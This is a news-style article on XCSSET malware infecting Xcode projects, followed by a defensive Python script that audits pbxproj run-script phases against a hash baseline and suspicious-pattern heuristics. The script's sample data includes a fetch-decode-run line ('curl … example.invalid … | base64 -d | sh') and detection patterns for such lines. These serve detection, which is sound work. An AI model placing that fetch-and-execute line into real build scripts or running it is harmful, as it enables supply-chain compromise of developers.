Security researchers have found several Xcode projects that contain malware capable of attacking Safari and other browsers. The malware, dubbed XCSSET, makes its way into Mac software projects by means that remain largely unknown.
Trend Micro researchers found that the malware is incorporated into the project itself, describing it as "an unusual infection associated with Xcode developer projects."
The malware has multiple payload options, and although it poses a potential risk to end users of software built with Apple's IDE, it appears to be a greater problem for the developers themselves.
The malware, which belongs to the XCSSET family, was found to include files suggesting that a target system would be placed under "command and control," meaning the attackers could control an infected Mac through the malware.
This opens the door to a wide range of actions on infected systems, including the collection of personal data and encryption-style ransomware attacks.
The team notes that what makes the malware unusual is that it is "injecting into local Xcode projects so that malicious code can be executed when the project is constructed." It is not yet clear how the code is being injected into the projects.
For development teams that rely on collaboration with others, Trend Micro warns that the threat becomes worse once projects shared through GitHub and other code repositories are taken into account, as this could lead to "supply chain attacks on users who rely on these repositories for their own projects."
Once installed, the malware can attack Safari and other browsers on the Mac to harvest useful user data.
Zero-day vulnerabilities were found as well: a Data Vault flaw that bypasses the System Integrity Protection feature of macOS, and a flaw in the WebKit development version of Safari that allows a fake Safari app to run in place of the legitimate one.
So far, the malware has been found in only two Xcode projects, neither of which is widely used by other developers, which severely limits its impact.
The malware's authors have collected a list of 380 victim IP addresses, with the vast majority of infected Macs in China and India.
Trend Micro recommends that project owners "continue to triple-check the integrity of their projects to definitely eliminate unwarranted issues such as malware infection."
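Because the article's key point is that malicious code runs when an infected project is built, one concrete way to act on the "verify the integrity of your projects" recommendation is to audit the run-script build phases in a project's `project.pbxproj` file, since those are the scripts Xcode executes during a build. The following Python script is an added example written for this page, not code from Trend Micro or from any Xcode project the article describes. It parses a constructed `project.pbxproj` fragment (embedded inline, not taken from a real project), lists every `PBXShellScriptBuildPhase`, hashes each script, and reports phases whose script hash is not in a trusted baseline or that match a few generic suspicious-script heuristics (network fetches piped into a shell, payload decoding). The baseline set, the heuristic patterns and the `example.invalid` URL in the sample are all assumptions made for the example.

```python
import hashlib
import re

# Constructed project.pbxproj fragment for demonstration (not from a real project).
# The second phase is written to look suspicious on purpose so the audit has something to flag.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4E5F60718293A4B5C /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = Lint;
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "swiftlint --quiet\n";
        };
        0F0E0D0C0B0A090807060504 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "echo \"prep\"; curl -fsSL http://example.invalid/p | base64 -d | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# One PBXShellScriptBuildPhase object: 24-hex-digit id, a /* comment */, then a {...} body.
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]{24}) /\* (?P<comment>[^*]*?) \*/ = \{\s*'
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};',
    re.S,
)
NAME_RE = re.compile(r'\bname = (?:"((?:[^"\\]|\\.)*)"|([^;"]+));')
SHELL_RE = re.compile(r'shellPath = (?:"([^"]*)"|([^;]+));')
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)

# Heuristics (assumption): patterns a reviewer would want to look at in any build script.
SUSPICIOUS_PATTERNS = {
    'network_fetch': re.compile(r'\b(curl|wget)\b'),
    'pipes_to_shell': re.compile(r'\|\s*(sh|bash|zsh)\b'),
    'decodes_payload': re.compile(r'\bbase64\b'),
}


def _unescape(value):
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    table = {'n': '\n', 't': '\t', '"': '"', '\\': '\\'}
    out, i = [], 0
    while i < len(value):
        if value[i] == '\\' and i + 1 < len(value):
            out.append(table.get(value[i + 1], value[i + 1]))
            i += 2
        else:
            out.append(value[i])
            i += 1
    return ''.join(out)


def find_script_phases(pbxproj_text):
    """Return every run-script build phase as a dict with id, name, shell, script and sha256."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        body = m.group('body')
        name_m = NAME_RE.search(body)
        name = (_unescape(name_m.group(1)) if name_m and name_m.group(1) is not None
                else name_m.group(2).strip() if name_m else m.group('comment'))
        shell_m = SHELL_RE.search(body)
        shell = (shell_m.group(1) or shell_m.group(2)).strip() if shell_m else ''
        script_m = SCRIPT_RE.search(body)
        script = _unescape(script_m.group(1)) if script_m else ''
        phases.append({
            'id': m.group('id'),
            'name': name,
            'shell': shell,
            'script': script,
            'sha256': hashlib.sha256(script.encode('utf-8')).hexdigest(),
        })
    return phases


def audit_project(pbxproj_text, trusted_script_hashes=frozenset()):
    """Return the phases that are not in the trusted baseline or trip a heuristic, with their flags."""
    findings = []
    for phase in find_script_phases(pbxproj_text):
        flags = []
        if phase['sha256'] not in trusted_script_hashes:
            flags.append('not_in_baseline')
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(phase['script']):
                flags.append(label)
        if flags:
            findings.append(dict(phase, flags=flags))
    return findings


if __name__ == '__main__':
    baseline = {p['sha256'] for p in find_script_phases(SAMPLE_PBXPROJ) if p['name'] == 'Lint'}
    for f in audit_project(SAMPLE_PBXPROJ, trusted_script_hashes=baseline):
        print(f"{f['id']} ({f['name']}) via {f['shell']}: {', '.join(f['flags'])}")
        print('    ' + f['script'].strip().replace('\n', '\n    '))
```

In practice the trusted hash set would be built from a known-good revision of the project and stored outside the repository, so that a script added or altered in a later commit shows up as `not_in_baseline` even when it looks harmless. The regular expressions are deliberately narrow to the `PBXShellScriptBuildPhase` section; a full OpenStep-plist parser would be more robust for unusual formatting, but the hash comparison is what carries the integrity check.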